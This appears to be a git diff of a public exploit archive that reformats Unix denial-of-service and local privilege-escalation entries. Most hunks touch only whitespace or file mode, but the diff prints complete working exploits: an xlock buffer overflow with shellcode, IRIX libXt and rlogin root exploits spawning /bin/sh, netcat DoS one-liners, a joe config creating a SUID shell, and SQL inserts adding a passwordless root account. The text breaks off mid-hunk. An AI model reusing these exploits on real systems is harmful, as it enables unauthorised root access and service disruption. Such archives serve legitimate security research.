a/platforms/unix/dos/24248.txt b/platforms/unix/dos/24248.txt old mode 100755 new mode 100644 index dc44976d8..acaa59855 --- a/platforms/unix/dos/24248.txt +++ b/platforms/unix/dos/24248.txt @@ -8,4 +8,4 @@ A remote attacker reportedly is able to cause a denial of service condition with IBM has released a patch dealing with this issue. This patch is available only to customers with support levels 2 or 3. -echo ?GET? | nc www.example.com <proxy_port> \ No newline at end of file +echo ?GET? | nc www.example.com <proxy_port> \ No newline at end of file diff --git a/platforms/unix/dos/24275.txt b/platforms/unix/dos/24275.txt old mode 100755 new mode 100644 index 225eab432..9fb4d9d34 --- a/platforms/unix/dos/24275.txt +++ b/platforms/unix/dos/24275.txt @@ -14,4 +14,4 @@ getAppletContext().showDocument("http://www.attacker.tld/ie-exploits.html"); } Stack-based buffer overflow: -<applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA" code="java.applet.Applet" width=100 height=100></applet> \ No newline at end of file +<applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA" code="java.applet.Applet" width=100 height=100></applet> \ No newline at end of file diff --git a/platforms/unix/dos/24593.txt b/platforms/unix/dos/24593.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/24594.txt b/platforms/unix/dos/24594.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/24595.txt b/platforms/unix/dos/24595.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/24596.txt b/platforms/unix/dos/24596.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/25353.txt b/platforms/unix/dos/25353.txt old mode 100755 new mode 100644 index 673f55250..e0faade0c --- a/platforms/unix/dos/25353.txt +++ b/platforms/unix/dos/25353.txt @@ -9,4 +9,4 @@ An attacker may leverage this issue to crash the nHTTP.EXE web service, denying GET /cgi-bin/[xxx] HTTP/1.0 Host: 10.10.0.100 -Where [xxx] represents a long string (~330) of UNICODE decimal value 430 characters. \ No newline at end of file +Where [xxx] represents a long string (~330) of UNICODE decimal value 430 characters. \ No newline at end of file diff --git a/platforms/unix/dos/31403.txt b/platforms/unix/dos/31403.txt old mode 100755 new mode 100644 index 2f2e5c507..d290fedec --- a/platforms/unix/dos/31403.txt +++ b/platforms/unix/dos/31403.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to cause the affected application to stop res echo "vfs.file.cksum[/dev/urandom]" | nc localhost echo "vfs.file.cksum[/dev/urandom]" | nc localhost -echo "vfs.file.cksum[/dev/urandom]" | nc localhost \ No newline at end of file +echo "vfs.file.cksum[/dev/urandom]" | nc localhost \ No newline at end of file diff --git a/platforms/unix/dos/31627.c b/platforms/unix/dos/31627.c old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/32009.txt b/platforms/unix/dos/32009.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/32454.xml b/platforms/unix/dos/32454.xml old mode 100755 new mode 100644 index 36022d1b6..66fdfb13d --- a/platforms/unix/dos/32454.xml +++ b/platforms/unix/dos/32454.xml @@ -12,4 +12,4 @@ XML file: <!DOCTYPE test [ <!ENTITY ampproblem '&amp;'> ]> -<t a="&ampproblem;">a</t> \ No newline at end of file +<t a="&ampproblem;">a</t> \ No newline at end of file diff --git a/platforms/unix/dos/32534.py b/platforms/unix/dos/32534.py index 8a4276a9e..0a712eb37 100755 --- a/platforms/unix/dos/32534.py +++ b/platforms/unix/dos/32534.py @@ -8,4 +8,4 @@ These issues affect versions prior to Python 2.5.2-r6. import imageop s = '' -imageop.crop(s, 1, 65536, 65536, 0, 0, 65536, 65536) \ No newline at end of file +imageop.crop(s, 1, 65536, 65536, 0, 0, 65536, 65536) \ No newline at end of file diff --git a/platforms/unix/dos/34145.txt b/platforms/unix/dos/34145.txt old mode 100755 new mode 100644 index 3d4c8727c..6fb4fd36d --- a/platforms/unix/dos/34145.txt +++ b/platforms/unix/dos/34145.txt @@ -4,4 +4,4 @@ The 'audioop' module for Python is prone to a memory-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. - $ python -c "import audioop; audioop.reverse('X', 2)" \ No newline at end of file + $ python -c "import audioop; audioop.reverse('X', 2)" \ No newline at end of file diff --git a/platforms/unix/dos/41142.c b/platforms/unix/dos/41142.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/19068.txt b/platforms/unix/local/19068.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/local/19108.txt b/platforms/unix/local/19108.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/local/19172.c b/platforms/unix/local/19172.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/19173.c b/platforms/unix/local/19173.c old mode 100755 new mode 100644 index d9fd7d4ee..2e2d6650f --- a/platforms/unix/local/19173.c +++ b/platforms/unix/local/19173.c @@ -1,96 +1,96 @@ +/* source: http://www.securityfocus.com/bid/224/info The xlock program is used to lock the local X display until the user supplies the correct password. A buffer overflow condition has been discovered in xlock that may allow an unauthorized user to gain root access. +*/ - /* - * - * /usr/bin/X11/xlock exploit (kinda' coded) by BeastMaster V - * - * CREDITS: this code is simply a modified version of an exploit - * posted by Georgi Guninski (guninski@hotmail.com) - * - * USAGE: - * $ cc -o foo -g aix_xlock.c - * $ ./foo 3200 - * # - * - * HINT: Try giving ranges from 3100 through 3400 - * (If these ranges don't work, then run the brute - * korn shell script provided after the exploit) - * - * DISCLAIMER: use this program in a responsible manner. - * - */ +/* + * + * /usr/bin/X11/xlock exploit (kinda' coded) by BeastMaster V + * + * CREDITS: this code is simply a modified version of an exploit + * posted by Georgi Guninski (guninski@hotmail.com) + * + * USAGE: + * $ cc -o foo -g aix_xlock.c + * $ ./foo 3200 + * # + * + * HINT: Try giving ranges from 3100 through 3400 + * (If these ranges don't work, then run the brute + * korn shell script provided after the exploit) + * + * DISCLAIMER: use this program in a responsible manner. + * + */ - #include <stdio.h> - #include <stdlib.h> - #include <string.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> - extern int execv(); +extern int execv(); - #define MAXBUF 600 +#define MAXBUF 600 - unsigned int code[]={ - 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , - 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c , - 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 , - 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c , - 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 , - 0x7c0903a6 , 0x4e800420, 0x0 - }; +unsigned int code[]={ + 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , + 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c , + 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 , + 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c , + 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 , + 0x7c0903a6 , 0x4e800420, 0x0 +}; - char *createvar(char *name,char *value) - { - char *c; - int l; +char *createvar(char *name,char *value) +{ + char *c; + int l; - l=strlen(name)+strlen(value)+4; - if (! (c=malloc(l))) {perror("error allocating");exit(2);}; - strcpy(c,name); - strcat(c,"="); - strcat(c,value); - putenv(c); - return c; - } + l=strlen(name)+strlen(value)+4; + if (! (c=malloc(l))) {perror("error allocating");exit(2);}; + strcpy(c,name); + strcat(c,"="); + strcat(c,value); + putenv(c); + return c; +} - main(int argc,char **argv,char **env) - { - unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt; - int min=200, max=300; - unsigned int return_address; - char *newenv[8]; - char *args[4]; - int offset=3200; +main(int argc,char **argv,char **env) +{ + unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt; + int min=200, max=300; + unsigned int return_address; + char *newenv[8]; + char *args[4]; + int offset=3200; - if (argc==2) offset = atoi(argv[1]); + if (argc==2) offset = atoi(argv[1]); - pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt; + pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt; - *((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff); - *((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000f -fff); - *((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff); - *((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000 -ffff); + *((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff); + *((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000ffff); + *((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff); + *((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000ffff); - return_address=(unsigned)&buf[0]+offset; + return_address=(unsigned)&buf[0]+offset; - for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82; - strcpy((char*)&buf[nop],(char*)&code); - i=nop+strlen( (char*) &code)/4-1; + for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82; + strcpy((char*)&buf[nop],(char*)&code); + i=nop+strlen( (char*) &code)/4-1; - for(i=0;i<max-1;i++) frame[i]=return_address; - frame[i]=0; + for(i=0;i<max-1;i++) frame[i]=return_address; + frame[i]=0; - newenv[0]=createvar("EGGSHEL",(char*)&buf[0]); - newenv[1]=createvar("EGGSHE2",(char*)&buf[0]); - newenv[2]=createvar("EGGSHE3",(char*)&buf[0]); - newenv[3]=createvar("EGGSHE4",(char*)&buf[0]); - newenv[4]=createvar("DISPLAY",getenv("DISPLAY")); - newenv[5]=createvar("HOME",(char*)&frame[0]); + newenv[0]=createvar("EGGSHEL",(char*)&buf[0]); + newenv[1]=createvar("EGGSHE2",(char*)&buf[0]); + newenv[2]=createvar("EGGSHE3",(char*)&buf[0]); + newenv[3]=createvar("EGGSHE4",(char*)&buf[0]); + newenv[4]=createvar("DISPLAY",getenv("DISPLAY")); + newenv[5]=createvar("HOME",(char*)&frame[0]); - args[0]="xlock"; - execve("/usr/bin/X11/xlock",args,newenv); - perror("Error executing execve \n"); + args[0]="xlock"; + execve("/usr/bin/X11/xlock",args,newenv); + perror("Error executing execve \n"); - } \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/unix/local/19200.c b/platforms/unix/local/19200.c old mode 100755 new mode 100644 index 13d80e00e..aadec3634 --- a/platforms/unix/local/19200.c +++ b/platforms/unix/local/19200.c @@ -1,83 +1,84 @@ +/* source: http://www.securityfocus.com/bid/237/info The libXt library is part of the X Windows system. There are several buffer overflow conditions that may allow an unauthorized user to gain root privileges through setuid and setgid programs that are linked to libXt. These problems were openly discussed on the Bugtraq mailing list in 1996, this discussion led the OpenGroup (maintainers of the X-Windowing System) to release a new version of X Windows which was more thoroughly audited and which hopefully addressed a series of buffer overflows. +*/ +/*## copyright LAST STAGE OF DELIRIUM jan 1997 poland *://lsd-pl.net/ #*/ +/*## libxt.so -xrm #*/ - /*## copyright LAST STAGE OF DELIRIUM jan 1997 poland *://lsd-pl.net/ #*/ - /*## libxt.so -xrm #*/ +#define NOPNUM 8000 +#define ADRNUM 2000 +#define PCHNUM 2000 +#define TMPNUM 2000 +#define ALLIGN 3 - #define NOPNUM 8000 - #define ADRNUM 2000 - #define PCHNUM 2000 - #define TMPNUM 2000 - #define ALLIGN 3 +char shellcode[]= + "\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */ + "\x24\x02\x03\xf3" /* li $v0,1011 */ + "\x23\xff\x01\x14" /* addi $ra,$ra,276 */ + "\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */ + "\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */ + "\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */ + "\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */ + "\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */ + "\x03\xff\xff\xcc" /* syscall */ + "/bin/sh" +; - char shellcode[]= - "\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */ - "\x24\x02\x03\xf3" /* li $v0,1011 */ - "\x23\xff\x01\x14" /* addi $ra,$ra,276 */ - "\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */ - "\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */ - "\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */ - "\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */ - "\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */ - "\x03\xff\xff\xcc" /* syscall */ - "/bin/sh" - ; +char jump[]= + "\x03\xa0\x10\x25" /* move $v0,$sp */ + "\x03\xe0\x00\x08" /* jr $ra */ +; - char jump[]= - "\x03\xa0\x10\x25" /* move $v0,$sp */ - "\x03\xe0\x00\x08" /* jr $ra */ - ; +char nop[]="\x24\x0f\x12\x34"; - char nop[]="\x24\x0f\x12\x34"; +main(int argc,char **argv){ + char buffer[20000],adr[4],pch[4],tmp[4],*b; + int i,n=-1; - main(int argc,char **argv){ - char buffer[20000],adr[4],pch[4],tmp[4],*b; - int i,n=-1; + printf("copyright LAST STAGE OF DELIRIUM jan 1997 poland //lsd-pl.net/\n"); + printf("libxt.so -xrm for irix 5.2 5.3 6.2 6.3 IP:17,19,20,21,22,32\n\n"); - printf("copyright LAST STAGE OF DELIRIUM jan 1997 poland //lsd-pl.net/\n"); - printf("libxt.so -xrm for irix 5.2 5.3 6.2 6.3 IP:17,19,20,21,22,32\n\n"); + if(argc!=2){ + printf("usage: %s {monpanel|printers|dmplay|datman|xwsh|cdplayer|" + "xconsole|xterm}\n",argv[0]); + exit(-1); + } + if(!strcmp(argv[1],"monpanel")) n=0; + if(!strcmp(argv[1],"printers")) n=1; + if(!strcmp(argv[1],"dmplay")) n=2; + if(!strcmp(argv[1],"datman")) n=3; + if(!strcmp(argv[1],"xwsh")) n=4; + if(!strcmp(argv[1],"cdplayer")) n=5; + if(!strcmp(argv[1],"xconsole")) n=6; + if(!strcmp(argv[1],"xterm")) n=7; + if(n==-1) exit(-1); - if(argc!=2){ - printf("usage: %s {monpanel|printers|dmplay|datman|xwsh|cdplayer|" - "xconsole|xterm}\n",argv[0]); - exit(-1); - } - if(!strcmp(argv[1],"monpanel")) n=0; - if(!strcmp(argv[1],"printers")) n=1; - if(!strcmp(argv[1],"dmplay")) n=2; - if(!strcmp(argv[1],"datman")) n=3; - if(!strcmp(argv[1],"xwsh")) n=4; - if(!strcmp(argv[1],"cdplayer")) n=5; - if(!strcmp(argv[1],"xconsole")) n=6; - if(!strcmp(argv[1],"xterm")) n=7; - if(n==-1) exit(-1); + *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+15000+8000; + *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+15000+15300+1000; + *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+15000+15300+1000+2000; - *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+15000+8000; - *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+15000+15300+1000; - *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+15000+15300+1000+2000; + b=buffer; + for(i=0;i<ALLIGN;i++) *b++=0xff; + for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; + for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; + *b++=0xff; + *b++=0xff; + for(i=0;i<TMPNUM;i++) *b++=tmp[i%4]; + for(i=0;i<ALLIGN;i++) *b++=0xff; + for(i=0;i<PCHNUM;i++) *b++=pch[i%4]; + for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; + *b=0; - b=buffer; - for(i=0;i<ALLIGN;i++) *b++=0xff; - for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; - for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; - *b++=0xff; - *b++=0xff; - for(i=0;i<TMPNUM;i++) *b++=tmp[i%4]; - for(i=0;i<ALLIGN;i++) *b++=0xff; - for(i=0;i<PCHNUM;i++) *b++=pch[i%4]; - for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; - *b=0; - - switch(n){ - case 0: execl("/usr/sbin/monpanel","lsd","-xrm",buffer,0); - case 1: execl("/usr/sbin/printers","lsd","-xrm",buffer,0); - case 2: execl("/usr/sbin/dmplay","lsd","-xrm",buffer,0); - case 3: execl("/usr/sbin/datman","lsd","-xrm",buffer,0); - case 4: execl("/usr/sbin/xwsh","lsd","-xrm",buffer,0); - case 5: execl("/usr/bin/X11/cdplayer","lsd","-xrm",buffer,0); - case 6: execl("/usr/bin/X11/xconsole","lsd","-xrm",buffer,0); - case 7: execl("/usr/bin/X11/xterm","lsd","-xrm",buffer,0); - } - } \ No newline at end of file + switch(n){ + case 0: execl("/usr/sbin/monpanel","lsd","-xrm",buffer,0); + case 1: execl("/usr/sbin/printers","lsd","-xrm",buffer,0); + case 2: execl("/usr/sbin/dmplay","lsd","-xrm",buffer,0); + case 3: execl("/usr/sbin/datman","lsd","-xrm",buffer,0); + case 4: execl("/usr/sbin/xwsh","lsd","-xrm",buffer,0); + case 5: execl("/usr/bin/X11/cdplayer","lsd","-xrm",buffer,0); + case 6: execl("/usr/bin/X11/xconsole","lsd","-xrm",buffer,0); + case 7: execl("/usr/bin/X11/xterm","lsd","-xrm",buffer,0); + } +} \ No newline at end of file diff --git a/platforms/unix/local/19201.c b/platforms/unix/local/19201.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/19202.c b/platforms/unix/local/19202.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/19203.c b/platforms/unix/local/19203.c old mode 100755 new mode 100644 index a1bc84ccb..f12b6c1d0 --- a/platforms/unix/local/19203.c +++ b/platforms/unix/local/19203.c @@ -1,59 +1,60 @@ +/* source: http://www.securityfocus.com/bid/242/info - The SUID rlogin program is used to establish remote sessions. A buffer overflow condition has been found in the rlogin program that may allow an unauthorized user to gain root access. The overflow in particular is in the rlogin code that handles the TERM enviroment variable. Similar bugs have been known to exist in some telnetd implementations. NOTE: The vulnerability was updated august 2, 2000 to reflect certain versions of IRIX to be vulnerable. +*/ - /*## copyright LAST STAGE OF DELIRIUM oct 1997 poland *://lsd-pl.net/ #*/ - /*## /usr/bsd/rlogin #*/ +/*## copyright LAST STAGE OF DELIRIUM oct 1997 poland *://lsd-pl.net/ #*/ +/*## /usr/bsd/rlogin #*/ - #define NOPNUM 4940 - #define ADRNUM 5000 - #define ALLIGN 2 +#define NOPNUM 4940 +#define ADRNUM 5000 +#define ALLIGN 2 - char shellcode[]= - "\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */ - "\x24\x02\x03\xf3" /* li $v0,1011 */ - "\x23\xff\x01\x14" /* addi $ra,$ra,276 */ - "\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */ - "\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */ - "\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */ - "\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */ - "\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */ - "\x03\xff\xff\xcc" /* syscall */ - "/bin/sh" - ; +char shellcode[]= + "\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */ + "\x24\x02\x03\xf3" /* li $v0,1011 */ + "\x23\xff\x01\x14" /* addi $ra,$ra,276 */ + "\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */ + "\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */ + "\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */ + "\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */ + "\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */ + "\x03\xff\xff\xcc" /* syscall */ + "/bin/sh" +; - char jump[]= - "\x03\xa0\x10\x25" /* move $v0,$sp */ - "\x03\xe0\x00\x08" /* jr $ra */ - ; +char jump[]= + "\x03\xa0\x10\x25" /* move $v0,$sp */ + "\x03\xe0\x00\x08" /* jr $ra */ +; - char nop[]="\x24\x0f\x12\x34"; +char nop[]="\x24\x0f\x12\x34"; - main(int argc,char **argv){ - char buffer[10000],adr[4],*b,*envp[2]; - int i; +main(int argc,char **argv){ + char buffer[10000],adr[4],*b,*envp[2]; + int i; - printf("copyright LAST STAGE OF DELIRIUM oct 1997 poland //lsd-pl.net/\n"); - printf("/usr/bsd/rlogin for irix 5.2 5.3 6.2 6.3 IP:17,19,20,21,22,32\n\n"); + printf("copyright LAST STAGE OF DELIRIUM oct 1997 poland //lsd-pl.net/\n"); + printf("/usr/bsd/rlogin for irix 5.2 5.3 6.2 6.3 IP:17,19,20,21,22,32\n\n"); - *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10288+7000; + *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10288+7000; - envp[0]=buffer; - envp[1]=0; + envp[0]=buffer; + envp[1]=0; - b=buffer; - sprintf(b,"TERM="); - b+=5; - for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; - for(i=0;i<ALLIGN;i++) *b++=0xff; - for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; - for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; - *b=0; + b=buffer; + sprintf(b,"TERM="); + b+=5; + for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; + for(i=0;i<ALLIGN;i++) *b++=0xff; + for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; + for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; + *b=0; - execle("/usr/bsd/rlogin","rlogin","localhost",0,envp); - } \ No newline at end of file + execle("/usr/bsd/rlogin","rlogin","localhost",0,envp); +} \ No newline at end of file diff --git a/platforms/unix/local/19582.c b/platforms/unix/local/19582.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/19583.c b/platforms/unix/local/19583.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/19590.c b/platforms/unix/local/19590.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/19697.c b/platforms/unix/local/19697.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/19823.txt b/platforms/unix/local/19823.txt old mode 100755 new mode 100644 index b303ac0db..ae96c6906 --- a/platforms/unix/local/19823.txt +++ b/platforms/unix/local/19823.txt @@ -14,4 +14,4 @@ Hit 'v' to bring up the file in vi :set shell=/bin/bash <RETURN> :shell <RETURN> -In addition, many RedHat 5.1 exploits should allow for the compromise of these machines. \ No newline at end of file +In addition, many RedHat 5.1 exploits should allow for the compromise of these machines. \ No newline at end of file diff --git a/platforms/unix/local/19904.txt b/platforms/unix/local/19904.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/local/19971.c b/platforms/unix/local/19971.c old mode 100755 new mode 100644 index 2ed88206b..5358f99bc --- a/platforms/unix/local/19971.c +++ b/platforms/unix/local/19971.c @@ -1,6 +1,7 @@ -source: http://www.securityfocus.com/bid/1276/info - -Buffer overflow vulnerabilities exist in elm (Electronic Mail for Unix). +// source: http://www.securityfocus.com/bid/1276/info +// +// Buffer overflow vulnerabilities exist in elm (Electronic Mail for Unix). +// /* Elm Exploit - Scrippie - #Phreak.nl - b0f - @@ -82,5 +83,4 @@ install. exit(-1); } exit(0); - } - \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/unix/local/19972.c b/platforms/unix/local/19972.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20042.c b/platforms/unix/local/20042.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20056.c b/platforms/unix/local/20056.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20073.txt b/platforms/unix/local/20073.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20107.txt b/platforms/unix/local/20107.txt old mode 100755 new mode 100644 index cf8a93669..08b1fc161 --- a/platforms/unix/local/20107.txt +++ b/platforms/unix/local/20107.txt @@ -41,4 +41,4 @@ cvs checkout: cannot open CVS/Entries.Log: No such file or directory % ls -l /tmp/foo -rw-r--r-- 1 akr wheel 4 Jul 19 22:01 /tmp/foo % cat /tmp/foo -abc \ No newline at end of file +abc \ No newline at end of file diff --git a/platforms/unix/local/20108.txt b/platforms/unix/local/20108.txt old mode 100755 new mode 100644 index 9d31f0a14..56eb0c4ac --- a/platforms/unix/local/20108.txt +++ b/platforms/unix/local/20108.txt @@ -23,4 +23,4 @@ done cvs server: Executing ''./binary' '/tmp/cvs/somemodule'' #cvs.lock #cvs.wfl.serein.m17n.org.14330 -binary,v \ No newline at end of file +binary,v \ No newline at end of file diff --git a/platforms/unix/local/20153.c b/platforms/unix/local/20153.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20154.c b/platforms/unix/local/20154.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20179.txt b/platforms/unix/local/20179.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20189.c b/platforms/unix/local/20189.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20190.c b/platforms/unix/local/20190.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20193.txt b/platforms/unix/local/20193.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20212.c b/platforms/unix/local/20212.txt old mode 100755 new mode 100644 similarity index 96% rename from platforms/unix/local/20212.c rename to platforms/unix/local/20212.txt index c105a546e..86e192b4a --- a/platforms/unix/local/20212.c +++ b/platforms/unix/local/20212.txt @@ -118,5 +118,4 @@ non-FreeBSD platforms. Patch: - outputname="/tmp/$$-$file" + outputname=$(mktemp "${TMPDIR:-/tmp}/$file.XXXXXX") || exit $? # Replace the output file specification. - relink_command=`$echo "X$relink_command" | $Xsed -e 's%@OUTPUT@%'"$outputname"'%g'` - \ No newline at end of file + relink_command=`$echo "X$relink_command" | $Xsed -e 's%@OUTPUT@%'"$outputname"'%g'` \ No newline at end of file diff --git a/platforms/unix/local/20294.txt b/platforms/unix/local/20294.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20333.c b/platforms/unix/local/20333.c old mode 100755 new mode 100644 index a01a22ee3..ea5610d6e --- a/platforms/unix/local/20333.c +++ b/platforms/unix/local/20333.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/1859/info A potential local root yielding buffer overflow vulnerability exists in Exim mail client version 1.62. A buffer used in processing filenames of message attachments can be overflowed by a maliciously-formed filename. As a result, the excessive data copied onto the stack can overwrite critical parts of the stack frame such as the calling functions' return address. Since this data is supplied by the user it can be a crafted so that alter the program's flow of execution. If properly exploited, this can yield root privilege to the attacker. +*/ /* sample code for one OS/compiler combination; ./this ./exim -bt you */ diff --git a/platforms/unix/local/20380.c b/platforms/unix/local/20380.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20381.c b/platforms/unix/local/20381.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20410.cpp b/platforms/unix/local/20410.cpp old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20526.c b/platforms/unix/local/20526.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20560.c b/platforms/unix/local/20560.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20621.txt b/platforms/unix/local/20621.txt old mode 100755 new mode 100644 index f9bcb8f8a..e4e0ab1e3 --- a/platforms/unix/local/20621.txt +++ b/platforms/unix/local/20621.txt @@ -15,4 +15,4 @@ $ cat >> /var/mfaslmf/nolicense [wait until the application server licenses are used up] $ /tmp/ksh -# \ No newline at end of file +# \ No newline at end of file diff --git a/platforms/unix/local/20658.txt b/platforms/unix/local/20658.txt old mode 100755 new mode 100644 index 2f88ddf3c..7877fb7e0 --- a/platforms/unix/local/20658.txt +++ b/platforms/unix/local/20658.txt @@ -11,4 +11,4 @@ Copying the /usr/local/lib/joerc file to a world writable directory, the followi :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty>/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod 4755 /tmp/suid",rtn,retype -This will bind the creation of a SUID shell in the /tmp directory to the keys ^[l. This exploit will allow the attacker to assume the identity of the user of joe. \ No newline at end of file +This will bind the creation of a SUID shell in the /tmp directory to the keys ^[l. This exploit will allow the attacker to assume the identity of the user of joe. \ No newline at end of file diff --git a/platforms/unix/local/20678.c b/platforms/unix/local/20678.c old mode 100755 new mode 100644 index d9df92ce0..6ab810340 --- a/platforms/unix/local/20678.c +++ b/platforms/unix/local/20678.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/2462/info ascdc is a program written for X by Rob Malda. It is designed to provide a graphical interface to cd changing on linux systems. @@ -5,6 +6,7 @@ ascdc is a program written for X by Rob Malda. It is designed to provide a graph A vulnerability in the program could allow elevated privileges on a system with the package installed setuid. Due to insufficent bounds checking, it is possible to execute arbitrary code with the ascdc program. Overflows in the -c, -d, and -m arguments make it possible for a user to overwrite variables on the stack, including the return address, and execute shellcode. The program is not installed setuid. However, in a setuid installation, this problem makes it possible for a user to execute arbitrary code, and potentially gain elevated privileges. +*/ char shellcode[]="\xeb\x15\x59\x31\xc0\x31\xdb\x31\xd2\xb0" "\x04\xb3\x01\xb2\x50\xcd\x80\x31\xc0\xb0" diff --git a/platforms/unix/local/20679.c b/platforms/unix/local/20679.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20697.c b/platforms/unix/local/20697.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20718.txt b/platforms/unix/local/20718.txt old mode 100755 new mode 100644 index a670982b5..187cda5f0 --- a/platforms/unix/local/20718.txt +++ b/platforms/unix/local/20718.txt @@ -15,4 +15,4 @@ create table make_me_r00t(qqq varchar(255)); insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n'); insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n'); \q -$ \ No newline at end of file +$ \ No newline at end of file diff --git a/platforms/unix/local/20766.c b/platforms/unix/local/20766.c old mode 100755 new mode 100644 index ba75ab847..f1cea5ff4 --- 